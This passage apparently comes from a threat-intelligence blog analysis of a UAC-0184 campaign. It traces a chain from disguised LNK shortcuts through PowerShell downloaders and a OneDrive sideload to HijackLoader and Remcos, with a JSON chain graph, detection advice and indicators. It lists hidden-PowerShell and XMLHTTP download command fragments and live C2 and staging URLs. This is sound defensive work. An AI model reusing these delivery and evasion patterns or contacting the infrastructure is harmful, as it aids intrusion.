"id": "e_c2",
"type": "ip",
"value": "144.31.236.240",
"x_port": 27018,
"x_protocol": "tcp",
"x_role_note": "Remcos C2 recovered from decrypted SETTINGS resource"
}
],
"iim_version": "1.1",
"name": "UAC-0184 LNK and PowerShell delivery to OneDrive sideload, HijackLoader and Remcos",
"needs_review": true,
"relations": [
{
"confidence": "confirmed",
"from": "e_initial_zip",
"sequence_order": 1,
"to": "e_readme",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_initial_zip",
"sequence_order": 2,
"to": "e_lnk_012",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_initial_zip",
"sequence_order": 3,
"to": "e_lnk_013",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_initial_zip",
"sequence_order": 4,
"to": "e_lnk_014",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_initial_zip",
"sequence_order": 5,
"to": "e_lnk_xlsx",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_lnk_012",
"sequence_order": 6,
"to": "e_ps1_rite_url",
"type": "download"
},
{
"confidence": "confirmed",
"from": "e_lnk_013",
"sequence_order": 7,
"to": "e_ps1_shout_url",
"type": "download"
},
{
"confidence": "confirmed",
"from": "e_lnk_014",
"sequence_order": 8,
"to": "e_ps1_hint_url",
"type": "download"
},
{
"confidence": "confirmed",
"from": "e_lnk_xlsx",
"sequence_order": 9,
"to": "e_ps1_collect_url",
"type": "download"
},
{
"confidence": "confirmed",
"from": "e_ps1_rite_url",
"sequence_order": 10,
"to": "e_rite_ps1",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_ps1_shout_url",
"sequence_order": 11,
"to": "e_shout_ps1",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_ps1_rite_url",
"sequence_order": 12,
"to": "e_delivery_ip",
"type": "resolves-to"
},
{
"confidence": "confirmed",
"from": "e_ps1_shout_url",
"sequence_order": 13,
"to": "e_delivery_ip",
"type": "resolves-to"
},
{
"confidence": "confirmed",
"from": "e_ps1_hint_url",
"sequence_order": 14,
"to": "e_delivery_ip",
"type": "resolves-to"
},
{
"confidence": "confirmed",
"from": "e_ps1_collect_url",
"sequence_order": 15,
"to": "e_delivery_ip",
"type": "resolves-to"
},
{
"confidence": "confirmed",
"from": "e_payload_zip_url",
"sequence_order": 16,
"to": "e_delivery_ip",
"type": "resolves-to"
},
{
"confidence": "confirmed",
"from": "e_rite_ps1",
"sequence_order": 17,
"to": "e_payload_zip_url",
"type": "download"
},
{
"confidence": "confirmed",
"from": "e_shout_ps1",
"sequence_order": 18,
"to": "e_payload_zip_url",
"type": "download"
},
{
"confidence": "confirmed",
"from": "e_payload_zip_url",
"sequence_order": 19,
"to": "e_payload_zip",
"type": "download"
},
{
"confidence": "confirmed",
"from": "e_payload_zip",
"sequence_order": 20,
"to": "e_clusterhub",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_payload_zip",
"sequence_order": 21,
"to": "e_update",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_payload_zip",
"sequence_order": 22,
"to": "e_logging",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_payload_zip",
"sequence_order": 23,
"to": "e_monitor",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_payload_zip",
"sequence_order": 24,
"to": "e_physics",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_clusterhub",
"sequence_order": 25,
"to": "e_update",
"type": "execute"
},
{
"confidence": "likely",
"from": "e_update",
"sequence_order": 26,
"to": "e_logging",
"type": "execute"
},
{
"confidence": "confirmed",
"from": "e_update",
"sequence_order": 27,
"to": "e_monitor",
"type": "references"
},
{
"confidence": "confirmed",
"from": "e_monitor",
"sequence_order": 28,
"to": "e_shellcode",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_shellcode",
"sequence_order": 29,
"to": "e_physics",
"type": "references"
},
{
"confidence": "confirmed",
"from": "e_physics",
"sequence_order": 30,
"to": "e_idat_stream",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_idat_stream",
"sequence_order": 31,
"to": "e_hijack_bundle",
"type": "drops"
},
{
"confidence": "likely",
"from": "e_hijack_bundle",
"sequence_order": 32,
"to": "e_inputdll",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_hijack_bundle",
"sequence_order": 33,
"to": "e_remcos",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_remcos",
"sequence_order": 34,
"to": "e_c2",
"type": "connect"
}
],
"title": "UAC-0184 LNK and PowerShell delivery to OneDrive sideload, HijackLoader and Remcos",
"x_evidence_url": "https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/",
"x_note": "Only ritecommunion.ps1 and shoutnewspaper.ps1 were available for direct inspection. hintprefix.ps1 and collectivisationgown.ps1 are confirmed as LNK-referenced URLs, but their bodies were not present in the analyzed set. Endpoint execution details are retained as chain context; IIM technique annotations are limited to applicable infrastructure/container properties."
}You can test it in the IIM Workbench
The same IP is therefore visible at both the staging and C2 positions.
The chain does not show a separate redirector, domain or frontend service in the analyzed artifacts.
The IIM representation also highlights an important distinction:
144.31.236.240:80is used for delivery while:
144.31.236.240:27018is used by the final payload for command and control.
They are the same infrastructure entity performing different roles within the campaign flow.
Defensive observations
The strongest detections should focus on combinations of artifacts and behavior rather than one filename.
Initial archive and shortcut signals
Investigate archives containing apparent image or Office filenames that end in .lnk, especially when accompanied by instructions telling the user to extract them before opening.
The observed shortcut command lines combine:
cmd.exe /v /c
MSXML2.XMLHTTP
ADODB.Stream
cscript //b
powershell -NoP -W Hidden -ExecutionPolicy BypassThe API names are reconstructed from smaller strings and the downloaded scripts are deleted after execution.
PowerShell staging signals
The recovered scripts:
- download
szch45clusterhum.zip; - create an
MSWinDistrodirectory; - extract the archive;
- execute
MSWinDistro/ClusterHub.exe; - open a matching JPG decoy.
The combination of an application-like extraction directory, OneDrive components and image decoys is unusual.
OneDrive sideload signals
Investigate OneDrive-related binaries running from:
Downloads
Desktop
%TEMP%
%APPDATA%or from an archive-created directory such as:
MSWinDistroThe following local combination is particularly relevant:
ClusterHub.exe
UpdateRingSettings.dll
LoggingPlatform.dll
monitor_base.sym
physicsdesc.mapContainer-level signals
The local payload containers can be detected structurally:
- large printable filler prefix;
- no valid PNG signature;
- repeated big-endian PNG chunk lengths;
- many consecutive
IDATchunks; - final
IEND; - reconstructed data that becomes meaningful after DWORD XOR and LZNT1 decompression.
These properties are likely to survive filename and hash rotation.
Network signals
Relevant observed endpoints are:
http://144.31.236[.]240/szch45/ritecommunion.ps1
http://144.31.236[.]240/szch45/shoutnewspaper.ps1
http://144.31.236[.]240/szch45/hintprefix.ps1
http://144.31.236[.]240/szch45/collectivisationgown.ps1
http://144.31.236[.]240/szch45clusterhum.zip
144.31.236[.]240:27018Connections to the HTTP paths indicate delivery activity.
Connections to TCP port 27018 are associated with the recovered Remcos configuration.
Conclusion
The newly recovered initial artifacts complete the chain.
The campaign does not begin with ClusterHub.exe.
It begins with a Ukrainian-language archive containing four shortcuts disguised as images and a spreadsheet.
Those shortcuts construct a small VBScript downloader, retrieve PowerShell stages and delete the temporary files after execution. The PowerShell scripts download a second ZIP, extract a OneDrive-themed application package, start the sideload host and open a real decoy file.
From that point onward, the chain follows the same broad architecture documented in the previous UAC-0184 sample:
The actor changed the delivery mechanism.
- They replaced the Plane9 exterior with OneDrive
- They rotated the container names, keys, offsets and final payload
- They retained the core loading pipeline and even reused the internal
%windir%\SysWOW64\input.dllpath
The newest build also provides a much clearer endgame.
The modular HijackLoader bundle decodes Remcos Agent 7.1.0 Pro, configured to communicate with the same server that delivered the initial PowerShell stages and secondary archive:
144.31.236.240:27018The exterior changed.
The loader skeleton remained.
And this time, the complete path from the first click to the final controller is visible.
Core indicators
Initial archive
spisokszch.zip
SHA-256:
c74bb6fb848cdb87c2b4261da1efc078023cdf95aa7b1436c52c26f3a11025af
JPG_012.jpg.lnk
SHA-256:
bb40c9d8c217516a92a18a1bdb080a5af92cfafe81f6751dea665e3e78cb4851
JPG_013.jpg.lnk
SHA-256:
fe38e54bedee074825eb3fcbe4824ed203876692a424e0c183e0006b31d1b7a8
JPG_014.jpg.lnk
SHA-256:
a8d0a03543db29d279175c9679eba574dcb7a17e306195a68ab1d033ee2be01c
spisokszch.xlsx.lnk
SHA-256:
6754f3854680767a394b22090f277fc53ec5a242faff54bf233084da5989c3ef
ritecommunion.ps1
SHA-256:
adf2c6f80229677615358b56f329aba9c3e9e009d9ca6d6deb0b805e6e212dbc
shoutnewspaper.ps1
SHA-256:
43579dd80314b6de4a1ca4e40b53ef0376a2ab55d50c8368e0b26af0af0d08c7
collectivisationgown.ps1
SHA-256:
95c8f0ac2e427a5637e554c60f649cab1fe55f649fe3aacde3c66fdc6491921b
hintprefix.ps1
SHA-256:
56b19b9f63a649e8cfb9a0e4bb73aac52fbc2265e9793a5b976221432d0ba77f
Secondary archive
szch45clusterhum.zip
SHA-256:
fee96a66a8c143ff4f172963a56a813427a65dad7758834bb3283685a37df633
ClusterHub.exe
SHA-256:
a11339f52a3b31d5a1f134e19bfc83d260ccbde4f14b14889bd824cc636c9a93
UpdateRingSettings.dll
SHA-256:
da48273d7d4ab1d71ecf50fec0a58884ddb2baf18d872f25cab3637519ef71d7
LoggingPlatform.dll
SHA-256:
c0713fd808170f2204a9bc091288e358c5f3266bf99a44f3a36a7ccc03732bb1
monitor_base.sym
SHA-256:
93621d3793198cb00c1a0450e8e3375d6c0de862a8449ab796c894062ae32612
physicsdesc.map
SHA-256:
ad17e13f05399f0c3a2b13505507a78d8c2dbe2850e507a2d78b9dfa2f5b5e9a
Decoded Remcos Agent
SHA-256:
40079f05ba7cdccac1f62f8e7e1b644bc0a806b58465f5c005725bc54ee73ef1
198995fecc0e38a2749b7e48c54112a959b77878683b726ee36430c4bacec196 00_000004f0_x86.bin
c50bffbef786eb689358c63fc0585792d174c5e281499f12035afa1ce2ce19c8 01_00045f4a_x86.bin
8e8e43a2f0069f081f5ffb77237faebcda9a46e8f8fd0e128500e74bbc9ea3a5 02_00091422_x64.bin
3594a835ed3dbf80ac460c0e852fa91baa3b17aadff9c3b40c03eff6b34658d2 03_000cd556_x86.bin
729e5965e43ff458f6da901536c9a43be52a3820718e2dd5456150e2d73bb97f 04_000ce156_x64.bin
68bee500e0080f21c003126e73b6d07804d23ac98b2376a8b76c26297d467abe 05_000e9b56_x86.bin
b02b8547644bbfe77428e59c5ccec56c412e3c83aec44180e59110189a249956 06_000ea556_x64.bin
324e2f2241604e53b88bd590213385abbb2961d3f17debfb4d40e4fa7bd9c4c0 07_001018c2_x86.bin
04_decompressed_hijackloader_bundle.bin
SHA256:
4870337bcd6e3ba0d82ca6a42604c05f1885c87967d0dc120f699d2b19706247
Delivery and C2:
144.31.236.240
144.31.236.240:27018
Mutex:
Rmc-X5JFP2
Configured filename:
remcos.exe